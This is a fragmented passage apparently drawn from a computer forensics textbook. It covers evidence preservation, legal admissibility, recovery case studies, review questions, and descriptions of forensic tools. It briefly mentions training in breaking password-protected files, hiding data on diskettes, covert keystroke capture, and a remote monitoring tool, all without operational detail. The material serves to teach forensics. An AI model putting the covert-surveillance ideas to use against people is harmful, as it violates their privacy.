Your computer forensics experts should also be able to regularly provide training to other forensic examiners, from both the government and private sectors
...

Sweep Your Office for Listening Devices

In today’s high-tech society, bugging devices, ranging from micro-miniature transmitters to micro-miniature recorders, are readily available
...
Your computer
forensics experts should have the equipment and expertise to conduct thorough
electronic countermeasures (ECM) sweeps of your premises
...
The experts should be uniquely qualified to conduct
investigations involving cellular telephone cloning, cellular subscription fraud, software piracy, data or information theft, trade secrets, computer crimes, misuse of
computers by employees, or any other technology issue
...
Don’t trust these sensitive inquiries to companies that
don’t have the required expertise
...
” Now, let’s examine how evidence
might be sought in a wide range of computer crime or misuse, including theft of
trade secrets, theft or destruction of intellectual property, and fraud
...

Any or all of this information may help during discovery, depositions, or litigation
...
It is always
beneficial when your case involves hardware and software with which this expert is
directly familiar, but fundamental computer design and software implementation
is often quite similar from one system to another
...

Unlike paper evidence, computer evidence can often exist in many forms, with
earlier versions still accessible on a computer disk
...
The discovery
process can be served well by a knowledgeable expert identifying more possibilities
that can be requested as possibly relevant evidence
...
These
may take the form of earlier versions of data files (memos, spreadsheets) that still
exist on the computer’s disk or on backup media or differently formatted versions
of data, either created or treated by other application programs (word processing,
spreadsheet, email, timeline, scheduling, or graphic)
...
A knowledgeable computer forensics professional should ensure that a subject computer system is carefully handled to ensure that
No possible evidence is damaged, destroyed, or otherwise compromised by the
procedures used to investigate the computer

18

Computer Forensics, Second Edition

No possible computer virus is introduced to a subject computer during the
analysis process
Extracted and possibly relevant evidence is properly handled and protected
from later mechanical or electromagnetic damage
A continuing chain of custody is established and maintained
Business operations are affected for a limited amount of time, if at all
Any client-attorney information that is inadvertently acquired during a forensic exploration is ethically and legally respected and not divulged [2]
...
1 in Appendix F) [2]
...


WHO CAN USE COMPUTER FORENSIC EVIDENCE?
Many types of criminal and civil proceedings can and do make use of evidence revealed by computer forensics specialists
...

Civil litigations can readily make use of personal and business records found on
computer systems that bear on fraud, divorce, discrimination, and harassment
cases
...

Corporations often hire computer forensics specialists to find evidence relating
to sexual harassment, embezzlement, and theft or misappropriation of trade
secrets, and other internal and confidential information
...

Individuals sometimes hire computer forensics specialists in support of possible claims of wrongful termination, sexual harassment, or age discrimination
...
Let’s
examine some of those problems
...
It must be
Authentic
Accurate
Complete
Convincing to juries
In conformity with common law and legislative rules (i
...
, admissible) [5]
There are also special problems:
Computer data changes moment by moment
...

The process of collecting computer data may change it—in significant ways
...

Computer and telecommunications technologies are always changing so that
forensic processes can seldom be fixed for very long [5]
...
The general principles are:
The scene of crime has to be frozen; that is, the evidence has to be collected as
early as possible and without any contamination
...

All procedures used in examination should be auditable; that is, a suitably qualified independent expert appointed by the other side in a case should be able to
track all the investigations carried out by the prosecution’s experts [5]
...
Even so, for
some purposes these may not be enough, for example, where it is hoped to recover
previously deleted material or where a logic bomb or virus is suspected
...
Special training is also required
...
Thus, the key features of the forensic technician are
Careful methodology of approach, including record keeping
A sound knowledge of computing, particularly in any specialist areas claimed
A sound knowledge of the law of evidence
A sound knowledge of legal procedures
Access to and skill in the use of appropriate utilities [5]

Legal Tests
The rules vary from legislation to legislation, but one can give a broad outline of
what happens in those countries with a common law tradition—the U
...
, U
...
, and
the so-called old Commonwealth
...
Real evidence is that which comes from
an inanimate object that can be examined by the court
...
The
hearsay rule operates to exclude assertions made other than those made by the witness who is testifying as evidence of the truth of what is being asserted
...
Thus, there are rules about the proving of documents and
business books
...
Some of the rules apply
explicitly to computers, but many do not, although they can be (and have been) interpreted to cover many situations in which computers are involved
...
K
...
In practice, these issues may
be circumvented
...
This evidence, however, then points investigators to admissible sources of evidence for the same sets of circumstances
...
In other words, computer search methods are
often used to identify allegedly fraudulent transactions, but the evidential items
eventually presented in court are paper-based invoices, contract notes, dockets, or
other documents
...
Again,
in civil litigation the parties may decide to jointly accept computer-based evidence
(or not to challenge it) and instead concentrate on the more substantive elements
in the dispute
...
Or, again, the legal team may not feel sufficiently competent to embark on a technical challenge
...
S
...
Law enforcement officers must comply with the Fourth
Amendment to the U
...
Constitution
...
The ultimate aim of forensic investigation is its
use in legal proceedings
...
It might be a mistake for inquiries not to be commenced simply because of fear of possible inadmissibility
...

One may have to take a somewhat pragmatic view of the precise bounds of the
subject matter, but it should still be possible to define its core activities
...

Although forensic science was already well established, and indeed forms a central feature of many of Conan Doyle’s Sherlock Holmes stories published from
1892 onwards, up until the 1970s, each forensic scientist tended to develop his or
her own methods and present them ad hoc to juries
...
During the 1970s, a more formal checklist-based approach
was introduced
...
K
...
In the U
...
Home Office Forensic
Service, these checklists were devised by senior staff
...
An increasingly used feature of modern practice is
quality control, which involves work being checked by an otherwise uninvolved
coworker before being offered to external scrutiny
...
The main reason is the rate of change of computer technology
...
However, in computers, newness and obsolesce is the norm
...
The floppy disk of 13 years ago was in 5
...
The
current equivalent is 3
...
44 MB, and much higher densities are
expected soon
...
25 inch form, and used modified frequency modulation (MFM) controller
technology
...
5 inch or
even 1
...
On minis and mainframes, data may be held on redundant array of independent (or inexpensive) disks (RAID), where individual files
may be split and spread over eight or more separate disk surfaces
...


Computer Forensics Fundamentals

23

Computer architectures have gone through profound changes in the same
short period
...

Computer peripherals keep changing as well
...
They
can be subverted, for example, for forgery
...
These provide opportunities for both high-tech criminals and forensic investigators
...

The foregoing simply lists technological changes
...
For example, over the same 13 years,
the following technological changes have taken place:
The growth of email, both locally within large organizations and worldwide
...

The software outcome of the more complex hardware architectures
...

The ability of a PC or small local machine to interact with software and data
held on other nonlocal machines and large mainframes in a way that appears to
be seamless to the user
...

The evidence of a transaction or event may, therefore, only be provable by the
presentation of all the records from all the computers involved, plus an explanation of how the assembly of the report relied on took place
...
EDIs have
very complex structures, with some evidence being held in computers owned
by the counter-parties and some by the EDI supplier/regulator
...

More extended, easier-to-use databases
...

The methods of writing and developing software
...
For example,
object-oriented programming environments and new, more formal methods
of program development; standards and methods of testing have also
changed [5]
...
Nevertheless, the usual way in which specific forensic
methods become accepted is via publication in a specialist academic journal
...

The rule of best practice refers to the use of the best practice available and known
at the time of the giving of evidence
...
At no point of the investigation is this more critical than at the stage
of initial evidence capture
...
Without the firm
base of solid procedures, which have been strictly applied, any subsequent antirepudiation attempts in court will be suspect, and the case as a whole will likely be
weakened
...
This may happen for several reasons
...
If the individuals involved have not been trained to the required standards, or have received no training
at all, then tainted or damaged computer evidence is the sad but inevitable result
...
Not only lack of site experience,
but also inappropriate experience of the type of systems, might be encountered
...
It is essential that a sympathetic working environment is created such that peer pressure or
fear of loss of status and respect does not override the need to call for help
...

Finally, sloppiness, time pressure, pressure applied on-site, fatigue, and carelessness have all been contributory factors in transforming solid computer evidence
into a dubious collection of files
...
There are issues with which one cannot sympathize
...


Computer Forensics Fundamentals

25

Ultimately, any time the collection of computer evidence is called into question, it is damaging to everyone who is a computer forensic practitioner; it is in
everyone’s best interest to ensure that the highest standards are maintained
...
I cannot find the con man now and all I have is
an alias and a pay-as-you-go mobile number
...
If you cannot obtain a real-world address (preferably within the jurisdiction in which you live), then think twice about going any further
...
K
...

Pagers start with 076xx
...

If you do want to proceed with the transaction, then use a credit card rather
than a debit card or other type of money transfer; then at least you will have some
protection and only be liable for $50 rather than having your entire bank account
cleaned out
...
An application for a civil search order can then
allow entry and the experts will be able to secure all electronic evidence quickly and
efficiently
...
So, yes, your
computer forensic experts can help, but by taking the proper precautions, you
would not need to call them in the first place
...
In recent months, investigators at Vogon International
Limited [7] have been asked to examine computer data for evidence of fraud
...


26

Computer Forensics, Second Edition

In both cases, fraud, totaling hundreds of thousands of dollars was uncovered
...
Bogus companies were set up and invoices were submitted for payment
...

In addition, one of the fraudsters was paying another member of the staff to
turn a blind eye to what was happening
...

The message is simple: whether you are a multinational company or a small
business, the possibility of fraud is ever present
...

Secure Erasure
Now, let’s touch on this “old chestnut” again, because it appears to be the source of
considerable confusion and misinformation
...

The latter may be criminals who wish to cover their tracks from the police or
legitimate business organizations who wish to protect themselves from confidential
information falling into the wrong hands
...

The legitimate destruction of data is ultimately a matter of management responsibility, which requires a considered risk analysis to be carried out
...

If you were to ask, Is it straightforward or certain?, it depends, would be the answer
...

Some are effective, some completely ineffective, and some partially effective
...

Those systems that absolutely destroy data do so in a manner that is total, unequivocal, and final; there can exist no doubt as to their effectiveness
...
With only cursory analysis, this is evident, so these are (or should be)
swiftly disregarded
...
What they find is that frequently only a fraction of a sample sent is correctly or accurately deleted
...
Certain
revisions of drive firmware can present special challenges; in some cases, even the
software used defeats the eraser
...


Computer Forensics Fundamentals

27

Vogon is often asked for advice on this issue [7]
...
If the destruction of data has more value than the drive, physically destroy the
drive
...
If the drive has more value
than the data, what are you worrying about?

CASE STUDIES
Over the years, Vogon’s data-recovery laboratories have seen pretty much everything that can happen to a computer, no matter how incredible, whether it is a geologist who, in testing for minerals, inadvertently blew up his own laptop, or the
factory worker who covered the computer running the production line in maple
syrup
...
Fortuitously, two in the latest of a long line of incredible recoveries recently occurred,
so, it seemed appropriate to include them as case studies
...
Almost immediately thereafter, a laptop accelerates rapidly groundward out of the
window of the aforementioned premises
...
Luckily, no one was injured by the impact
...

The laptop computer had impacted the ground across its front edge at an angle,
forcing the hard disk drive assembly to go completely through the screen of the laptop
...
This
imparted an oscillation in two dimensions during drive operation
...
After an evening’s work by a highly skilled
hardware engineer, it was determined that a full fix was possible, and a perfect
image was taken
...

Case Study Two: The Case of the Burned Tapes
This case does not involve true forensic investigation, but it does highlight the fact that
it is important never to give up on a job, no matter how seemingly hopeless it appears
...
The DAT tapes were caught in a fire, which had engulfed a company’s
head office and wiped out the primary trading infrastructure
...
The
DAT tapes had, rather inadvisably as it turned out, not been stored off-site
...

Despite this, the DAT tapes arrived in a rather sorry condition
...
It is fair to say the tapes were sent to Vogon with the full
expectation that they would be declared unrecoverable and used as the basis from
which to make a loss settlement [7]
...
The tapes were carefully cut away from the molten mass and treated for
fire damage
...
Following a number of complex stages, the recovery team was
able to extract a stream of data from the tapes that accounted for some 95% of the
original data stored on the company’s tape backups
...
It also resulted in a significant reduction in the claims settlement by the loss adjuster and business continuity for the unfortunate company
...
In 1977,
there were 291 U
...
federal cases and 246 state cases in which the word computer appeared and which were sufficiently important to be noted in the Lexis database
...
K
...
However, as early as 1968, the computer’s existence
was considered sufficiently important for special provisions to be made in the English Civil Evidence Act
...
As far as one can tell, noncontentious cases tend not
to be reported, and the arrival of computers in commercial disputes and in criminal cases did not create immediate difficulties
...
This is not to say that such cases were
without difficulty; however, no completely new principles were required
...

Some of these were tackled in legislation, as with the English 1968 act and the U
...

Federal Rules of Evidence in 1976, but many were addressed in a series of court
cases
...
For example, computer-originated evidence or information that is not
immediately readable by a human being is usually gathered by a mechanical counting or weighing instrument
...

The focus of most of this legislation and judicial activity was determining the
admissibility of the evidence
...
They extend beyond
mere guidance
...
Nevertheless, they have acquired a status of
their own and in some cases prevent a court from making ad hoc common sense
decisions about the quality of evidence
...
It
is not wholly possible for someone interested in the practical aspects of computer
forensics (that is, the issues of demonstrating authenticity, reliability, completeness,
or lack thereof) to separate out the legal tests
...
The following conclusions are not exhaustive, nor is the
order significant
...
This
is the direct analogy to proving the authenticity of a print-based document
...
This is the situation where a
series of original events or transactions are input by human beings, but where
after regular computer processing, a large number of reports, both via print-out
and on-screen can be generated
...

Real evidence: Machine-readable measurements and the like (weighing, counting, or otherwise recording events) and the reading of the contents of magnetic
stripes and bar codes and smart cards
...


30

Computer Forensics, Second Edition

Electronic transactions: To prove that a transaction took place or to demonstrate a presumption was incorrect
...

Conclusions reached by search programs: These are programs that have
searched documents, reports, and so on, for names and patterns
...

Event reconstruction: To show a sequence of events or transactions passing
through a complex computer system
...
Typical examples include computer contract disputes (when a computer failed to deliver acceptable levels of service and blame
must be apportioned), disaster investigations, and failed trade situations in securities dealing systems
...
Liability in a situation is also where a
computer program has made a decision (or recommendation) based on the application of rules and formulae, where the legal issue is the quality and reliability of the application program, and the rules with which it has been fed
...

An Agenda for Action
When completing the Principle Forensic Activities Checklist (as shown in Table F1
...
The order is not significant;
however, these are the activities for which the researcher would want to provide a detailed description of procedures, review, and assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and an optional team case
project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...

5
...


32

Computer Forensics, Second Edition

Multiple Choice
1
...
How to recover data from computers while preserving evidential integrity
B
...
How to securely store and handle recovered data
D
...
How to present the information to a court of law and to defense during disclosure
2
...
A defined methodology
B
...
A breach of contract
D
...
Tort, including negligence
3
...
Simple to use
B
...
Totally reliable
D
...
Legally operable
4
...
The computer forensics specialist will take several careful steps to
identify and attempt to retrieve possible evidence that may exist on a subject
computer system
...
Protects the subject computer system during the forensic examination from
any possible alteration, damage, data corruption, or virus introduction
B
...
This includes existing normal files,
deleted yet remaining files, hidden files, password-protected files, and encrypted files
C
...
Reconstructs system failure
E
...
A computer forensics professional does more than turn on a computer, make
a directory listing, and search through files
...
For example, they should
be able to perform the following services, except:
A
...
Data duplication and preservation
C
...
Document searches
E
...

Please explain how the computer forensics professional went about resolving the
problem
...
How would your computer forensics team go about preserving and recovering the electronic data?
Case Project
Let’s look at a real-world scenario and how computer forensics plays into it
...

She captures several minutes worth of network traffic to review with a protocol analyzer
...
A user’s desktop
has sent a well-formed packet to an obscure port on an unfamiliar IP address outside the company’s firewall
...
This intrigues the sysadmin,
who does a lookup of the IP address; it comes back as one of the firm’s competitors
...
She picks up the phone and calls
her boss
...
Please explain how you would handle this situation
...
How do you as
a computer forensics specialist handle this?

REFERENCES
[1] “2003 Computer Crime and Security Survey,” Federal Bureau of Investigation, J
...
C
...

[2] Robbins, Judd, “An Explanation of Computer Forensics,” National Forensics Center, 774 Mays Blvd
...
All rights reserved), 2001
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, 18950 U
...

Highway 441, Suite 201, Mount Dora, Florida 32757, 2001
...
All rights reserved), 2001
...

http://csrc
...
ac
...

[6] Vacca, John R
...

[7] Vogon Forensics Bulletin, Vol
...


2

Types of Computer
Forensics Technology

efensive information technology will ultimately benefit from the availability of cyber forensic evidence of malicious activity
...
Today, an increased opportunity for cyber crime exists, making advances
in the law enforcement, legal, and forensic computing technical arenas imperative
...
Cyber forensics focuses on real-time, online evidence gathering rather than
the traditional offline computer disk forensic technology
...
The first, computer forensics, deals with gathering evidence from computer
media seized at the crime scene
...
Several computer
forensic tools are available to investigators
...
It involves gathering
digital evidence that is distributed across large-scale, complex networks
...

Network forensics deals primarily with in-depth analysis of computer network intrusion evidence, because current commercial intrusion analysis tools are inadequate to deal with today’s networked, distributed environments
...
In

D

35

36

Computer Forensics, Second Edition

a networked, distributed environment, it is imperative to perform forensic-like examinations of victim information systems on an almost continuous basis, in addition to traditional postmortem forensic analysis
...
Few, if any, forensic
tools are available to assist in preempting the attacks or locating the perpetrators
...
These objectives include timely cyberattack
containment, perpetrator location and identification, damage mitigation, and recovery initiation in the case of a crippled, yet still functioning, network
...
Cyber forensics adds inspection of transient and other frequently overlooked
elements such as contents or state of memory, registers, basic input/output system,
input/output buffers, serial receive buffers, L2 cache, front side and back side system
caches, and various system buffers (drive and video buffers)
...
It
is beyond the scope of this chapter to cover in detail every type of computer forensic technology
...


TYPES OF MILITARY COMPUTER FORENSIC TECHNOLOGY
The U
...
Department of Defense (DoD) cyber forensics includes evaluation and indepth examination of data related to both the trans- and post-cyberattack periods
...
Real-time tracking of potentially malicious activity is especially difficult when the pertinent information has been intentionally
hidden, destroyed, or modified in order to elude discovery
...
The directorate entered into
a partnership with the National Institute of Justice via the auspices of the National
Law Enforcement and Corrections Technology Center (NLECTC) located in
Rome, New York, to test these new ideas and prototype tools
...
This firstof-a-kind event represents a new paradigm for transitioning cyber forensic technology from military research and development (R&D) laboratories into the hands
of law enforcement
...


Types of Computer Forensics Technology

37

The central hypothesis of CFX-2000 is that it is possible to accurately determine
the motives, intent, targets, sophistication, identity, and location of cyber criminals
and cyber terrorists by deploying an integrated forensic analysis framework
...

The NLECTC assembled a diverse group of computer crime investigators from
DoD and federal, state, and local law enforcement to participate in the CFX-2000
exercise hosted by the New York State Police’s Forensic Investigative Center in Albany, New York
...
Each team received an identical set of software tools and was presented with identical initial
evidence of suspicious activity
...
1) [1]
...
The Synthesizing
Information from Forensic Investigations (SI-FI) integration environment, developed under contract by WetStone Technologies, Inc
...
SI-FI supports the collection, examination, and
analysis processes employed during a cyber forensic investigation
...
Investigators can seal evidence in the DEBs
and use the SI-FI implementation to collaborate on complex investigations
...
The teams used
other forensic tools and prototypes to collect and analyze specific features of the

FIGURE 2
...
All rights reserved)
...
The results of CFX2000 verified that the hypothesis was largely correct and that it is possible to
ascertain the intent and identity of cyber criminals
...


TYPES OF LAW ENFORCEMENT COMPUTER
FORENSIC TECHNOLOGY
As previously defined, computer forensics involves the preservation, identification,
extraction, and documentation of computer evidence stored in the form of magnetically encoded information (data)
...
Such information may actually be hidden from view and, thus,
special forensic software tools and techniques are required to preserve, identify, extract, and document the related computer evidence
...
Computer forensics tools and techniques have become important
resources for use in internal investigations, civil lawsuits, and computer security
risk management
...

Such computer forensic software tools can also be used to identify backdated files
and to tie a diskette to the computer that created it
...
This section touches very briefly on issues dealing with
Windows NT®, Windows® 2000, XP and 2003 and their use within law enforcement
computer forensic technology
...
Thus,
they are currently the operating systems most likely to be encountered in computer
investigations and computer security reviews
...
Those tools are good
for some basic investigation tasks, but they do not offer a full computer forensics
solution
...
Such assessments usually require that searches and file listings be conducted overtly or even covertly from a single floppy diskette
...
Computer processing procedures have also been developed for the U
...
Treasury Department
...
For these reasons,
computer forensic trainers and instructors should be well qualified to teach the correct computer-processing methods and procedures
...
Computer forensic instructors should expose their trainees to
bit stream backup theories that ensure the preservation of all storage levels that may
contain evidence
...
SafeBack technology can be purchased from
New Technologies, Inc
...
S
...


MIRROR IMAGE BACKUP SOFTWARE
SafeBack is used to create mirror-image (bit-stream) backup files of hard disks or to
make a mirror-image copy of an entire hard disk drive or partition
...
Once the photo negative has been made, several exact reproductions can be made of the original
...
This is because SafeBack is an industry standard self-authenticating computer
forensics tool that is used to create evidence-grade backups of hard drives
...
0 or higher, the integrity of SafeBack files is
maintained through the use of two separate mathematical hashing processes that rely
upon the National Institute of Standards and Technology (NIST)-tested Secure Hash
Algorithm256 (SHA256)
...
0
...
forensicsintl
...
The upgrade of SafeBack has new and added features and it takes into account
the last sector error finding by NIST concerning the older SafeBack version 2
...

URLs are subject to change without notice
...

SafeBack preserves all the data on a backed-up or copied hard disk, including inactive
or deleted data
...

Remote operation via a parallel port connection allows the hard disk on a remote PC
to be read or written by the master system
...
This hash can be used to
cross-validate the accuracy of the process with any other software utility that relies
upon the NIST-tested SHA256 algorithm
...
Any alterations of computer data are quickly brought to the
attention of the operator of the program when the SafeBack image file is restored
...
SafeBack picks up every last bit of data-unused and erased data included—on
the original disk and stores it in a tape or disk file (or series of files)
...

SafeBack does not write or otherwise modify the original system and can (and
should) be started from a boot diskette
...
The first is Verify
mode, where restoring from a backup disk is done, but the data is thrown away
...
The other derivative operation is Copy, which feeds the Restore function
directly with the output of the Backup function, with no intermediate files
...
If the operator of SafeBack is considering making a copy, he might as well make a backup image file and then restore it as needed
...

No software dongle
...

Incorporates two separate implementations of the NIST-tested SHA256 algorithm
to ensure the integrity of all data contained on the target computer storage device
...

Checks for possible data hiding when sector cyclic redundancy checks (CRCs)
do not match on the target hard disk drive
...

Accurately copies all areas of the hard disk drive
...

Allows for the backup process to be made via the printer port
...

SafeBack image files can be stored as one large file or separate files of fixed sizes
...

Uses tried and proven evidence preservation technology with a long-term
legacy of success in government agencies
...

It is fast and efficient
...
Processing
speeds are much faster when state-of-the-art computer systems are used to
make the backup
...

Copies and restores multiple partitions containing one or more operating systems
...

Accuracy is guaranteed in the backup process through the combination of
mathematical CRCs that provides a level of accuracy that far exceeds the accuracy provided by 128-bit CRCs (RSA MD5)
...

The current version of SafeBack compresses unused and unformatted sections
of the hard disk drive to increase processing speeds and to conserve storage
space concerning the writing of the SafeBack image file [3]
...
The participant should be able to demonstrate his or her ability to avoid destructive programs
and traps that can be planted by computer users bent on destroying data and evidence
...

Computer Forensics Documentation

The documentation of forensic processing methodologies and findings is important
...
If
the security or audit findings become the object of a lawsuit or a criminal investigation, then documentation becomes even more important
...
The benefits will be
obvious to investigators, but they will also become clear to internal auditors and
computer security specialists
...
Techniques and automated tools
that are used to capture and evaluate file slack should be demonstrated in a training course
...
These security and evidence issues should also be discussed and demonstrated during the
training course
...


Types of Computer Forensics Technology

43

Data-Hiding Techniques

Trade secret information and other sensitive data can easily be secreted using any
number of techniques
...
These issues should be discussed in any
computer forensics training course from a detection standpoint, as well as from a
security risk standpoint
...
Participants should be required to
demonstrate their understanding of such issues
...
Data-hiding courses are only open to classified government agencies and
businesses that have a demonstrated need to know about this kind of information
as outlined in a company’s training policies
...


ANADISK DISKETTE ANALYSIS TOOL
AnaDisk turns your PC into a sophisticated diskette analysis tool
...
S
...
It is
primarily used to identify data storage anomalies on floppy diskettes and generic
hardware in the form of floppy disk controllers; bios are needed when using this
software
...
The software also has limited search capabilities and can be used to copy
abnormal diskettes
...

AnaDisk has the capability to duplicate floppy diskettes, but this feature is used
primarily with odd diskette formats (in cases like the FBI Russian mole case of suspected spy Robert Phillip Hanssen)
...
’s CopyQM (see
sidebar “CopyQM: Diskette Duplication Software”), which has been upgraded and
certified by the U
...
DoD for making copies of diskettes used in classified computer
security risk reviews
...
It can also be used in data-hiding courses
to create data-hiding areas by adding extra sectors and tracks to floppy diskettes and
in writing data to unformatted floppy diskettes
...

No software dongle
...

Keyword searches can be conducted at a very low level and on diskettes that
have been formatted with extra tracks
...

All DOS formats are supported, as well as many non-DOS formats (Apple
Macintosh, Unix TARTM, and many others
...

Allows custom formatting of diskettes with extra tracks and sectors
...

Data mismatches, concerning some file formats, are also identified when file
extensions have been changed in an attempt to hide data
...


COPYQM: DISKETTE DUPLICATION SOFTWARE
CopyQM Plus essentially turns a personal computer into a diskette duplicator
...
This capability is useful for
computer forensics specialists and computer security specialists who need to preconfigure floppy diskettes for specific uses and duplicate them
...
Programs like New
Technology Inc
...
S
...
CopyQM is also certified by
the U
...
DoD for use in the duplication of “search disks” used in classified U
...
government computer risk reviews
...
This feature makes CopyQM an ideal tool for use
in security reviews because once a CopyQM disk-creation program has been created,
it can be used by anyone to create pre-configured security risk assessment diskettes
...

This process requires little technical knowledge and it allows computer specialists to delegate more of the security risk assessment responsibilities to employees
with minimal technical knowledge
...
This is
helpful when you want to keep computer forensic and computer security software
tools away from curious hands
...

It can be used to make one or more copies of all areas of a normal floppy diskette
...
This can be
helpful when you need to repeatedly make copies of diskettes for training classes
...

It can be used to automatically create and serialize software stored on floppy
diskettes
...

CopyQM Plus can be used to password protect the contents of an entire floppy
diskette
...

CopyQM Plus can be used to create virus-scanned floppy diskette tool kits configured for repeated tasks performed by computer forensics specialists, electronic
data personnel (EDP), auditors and computer security specialists
...

CopyQM Plus can be used to send a normal diskette over the Internet
...

No software dongle
...

It converts diskettes into self-contained programs that, when executed, recreate the original master diskette as many times as desired
...

Images may be optionally password protected through the use of built-in encryption
...

When this feature is selected, a log of the process is maintained for reference
...

CopyQM Plus is significantly faster than DOS DiskCopy and it automatically
copies the subject diskette, verifies the copy, and formats the target diskette
during the restoration process
...
44 MB)
...
2 MB, 1
...
68 MB, and 2
...

CopyQM Plus can be used to duplicate and restore any number of copies of a
given master diskette
...
It does not
copy all areas of copy protected diskettes (extra sectors added to one or more
tracks on a floppy diskette)
...


E-Commerce Investigations

A new Internet forensic tool has recently been introduced that aims to help educators, police, and other law enforcement officials trace the past World Wide Web activity of computer users
...
(NTI), can be used to identify past Internet browsing and
email activity done through specific computers
...

Kids can figure out ways to prevent their parents from finding anything on
their machine, but Net Threat Analyzer goes back in after the fact where things

Types of Computer Forensics Technology

47

are easier to detect
...
has made its Net Threat Analyzer available free of charge to computer crime specialists, school officials, and police
...
It flags possible threats, such as anything dealing with drugs, bombs, country codes, or pornography
...

For example, http://www
...
gov, is the official White House Web site,
and www
...
com is a pornography site
...
com
500 to 700 times, it will make it through most net nanny software, but it will raise
a red flag with the Net Threat Analyzer
...

New Technology Inc
...
forensicsintl
...
The tool is not available to the public, but a special version can be
purchased by Fortune 500 companies, government agencies, military agencies, and
consultants who have a legitimate need for the software
...
They can also be designed for delayed tasking
...
The participant should also have hands-on experience with these
programs
...
has also developed specialized search techniques and tools
that can be used to find targeted strings of text in files, file slack, unallocated file
space, and Windows swap files
...

This search tool is approved for use in security reviews by some U
...
government
classified agencies
...
It is widely used by classified government agencies and corporations that support these agencies
...

This software is used to quickly search hard disk drives, zip disks, and floppy
diskettes for key words or specific patterns of text
...
TextSearch Plus has been specifically designed
to meet the requirements of the government for use in computer security exit
reviews from classified government facilities
...
It is also compatible with FAT 12, FAT 16, and FAT
32 DOS-based systems
...
Tests indicate that this tool finds more text strings than any other
forensic search tool
...
tool suites
...
When security spills are identified, they can easily be eliminated with New
Technology Inc
...


P RIMARY U SES
Used to find occurrences of words or strings of text in data stored in files, slack,
and unallocated file space
Used in exit reviews of computer storage media from classified facilities
Used to identify data leakage of classified information on nonclassified computer systems
Used in internal audits to identify violations of corporate policy
Used by Fortune 500 corporations, government contractors, and government
agencies in security reviews and security risk assessments
Used in corporate due diligence efforts regarding proposed mergers
Used to find occurrences of keywords strings of text in data found at a physical
sector level
Used to find evidence in corporate, civil, and criminal investigations that involve computer-related evidence
Used to find embedded text in formatted word processing documents (WordPerfectTM and fragments of such documents in ambient data storage areas)

Types of Computer Forensics Technology

P ROGRAM F EATURES

AND

49

B ENEFITS

DOS-based for ease of operation and speed
...
Software dongles get in the way and they restrict your
ability to process several computers at the same time
...

Compact program size, which easily fits on one floppy diskette with other
forensic software utilities
...

Has logical and physical search options that maintain compatibility with government security review requirements
...

User configuration is automatically saved for future use
...

Alert for graphic files (secrets can be hidden in them)
...

High speed operation
...

False hits don’t stop processing
...

Currently used by hundreds of law enforcement computer crime units
...

Currently used by several government military and intelligence agencies
...

The current version allows for up to 120 search strings to be searched for at one
time [5]
...
has also developed a methodology and tools that aid in the
identification of relevant evidence and unknown strings of text
...
However, many times not all is known about what may be stored on
a given computer system
...
The training participants should be able
to fully understand these methods and techniques
...
Each training participant should also leave the class
with a licensed copy of New Technology Inc
...


INTELLIGENT FORENSIC FILTER
This forensic filter utility is used to quickly make sense of nonsense in the
analysis of ambient data sources (Windows swap/page files, file slack, and data
associated with erased files)
...
S
...
It is used to quickly
identify patterns of English language grammar in ambient data files
...
The program can be used
as a sampling tool and it is particularly useful when used to evaluate Windows
swap/page files
...
’s Filter_I prior to March, 2003
...


P RIMARY U SES
Used as an intelligence gathering tool for quick assessments of a Windows
swap/page file to identify past communications on a targeted computer
Used as a data sampling tool in law enforcement, military, and corporate investigations
Used to quickly identify patterns of English language grammar in ambient data
sources
Used to identify English language communications in erased file space

P ROGRAM F EATURES

AND

DOS-based for speed
...


B ENEFITS

Types of Computer Forensics Technology

51

Automatically processes any data object (a swap file, a file constructed from
combined file slack, a file constructed from combined unallocated space, or a
Windows swap/page file
...

Can be operated in batch mode with other forensic tools and processes
...

Capable of quickly processing ambient data files that are up to 2 gigabytes in size
...

Quantity discounts and site licenses are available [6]
...
They should
also demonstrate their knowledge of how to modify the structure and hide data in
obscure places on floppy diskettes and hard disk drives
...

Furthermore, demonstrations of password-recovery software should be given regarding encrypted WordPerfect, Excel, Lotus, Microsoft Word, and PKZIP files
...

Matching a Diskette to a Computer

New Technology Inc
...
Unlike some special government agencies, New Technology Inc
...

Each participant is taught how to use special software tools to complete this process
...
Furthermore, the participant

52

Computer Forensics, Second Edition

should learn how password-protected compressed files can be broken; this should
be covered in hands-on workshops during the training course
...

These techniques should also be demonstrated by the participant, and cluster
chaining will become familiar to the participant
...
This process will focus on computer forensics issues tied to data that the computer user probably doesn’t realize
exists (file slack, unallocated file space, and Windows swap files)
...
Such a technique could be used to covertly capture
keyboard activity from corporate executives, for example
...


TYPES OF BUSINESS COMPUTER FORENSIC TECHNOLOGY
Finally, let’s briefly look at the following types of business computer forensics
technology:
Remote monitoring of target computers
Creating trackable electronic documents
Theft recovery software for laptops and PCs
Basic forensic tools and techniques
Forensic services available

Remote Monitoring of Target Computers
Data Interception by Remote Transmission (DIRT) from Codex Data Systems
(CDS), Inc
...
No physical access is necessary
...

Creating Trackable Electronic Documents
There are so many powerful intrusion detection tools that allow the user to create
trackable electronic documents that it is beyond the scope of this chapter to
mention them all
...

In general, most of these tools identify (including their location) unauthorized
intruders who access, download, and view these tagged documents
...

Theft Recovery Software for Laptops and PCs
If your PC or laptop is stolen, is it smart enough to tell you where it is? According
to a recent FBI report, 98% of stolen computers are never recovered
...
8 billion dollars [9]
...

Nationwide losses to computer component theft cost corporate America over
$11 billion a year
...

What Is the Real Cost of a Stolen Laptop or PC?

When you lose your wallet, the last thing you think of is how much it is going to
cost to replace your wallet
...

Our mothers always told us, an ounce of prevention is worth a pound of cure
...
Think about what it really costs to replace a stolen computer
...

The price of replacing the software
...
If possible at all, do you keep perfect back-ups?
The cost of lost production time or instruction time
...

The cost of reporting and investigating the theft, filing police reports and insurance claims
...


54

Computer Forensics, Second Edition

The cost of processing and ordering replacements, cutting a check, and the like
...

So, doesn’t it make sense to use an ounce of prevention? You don’t have to be
a victim
...
com has a solution: PC PhoneHomeTM [9] is a
software application that will track and locate a lost or stolen PC or laptop anywhere in the world
...
It is also completely transparent to the user
...
In other words, PC PhoneHome is a transparent
theft protection and recovery software system that you install on your laptop or PC
...
Let’s look at the following scenario [9]
...
On your first business trip with your new computer you leave it (you
think) safely hidden in your hotel room while you entertain a client
...
The financial loss is bad enough, but the hours of work
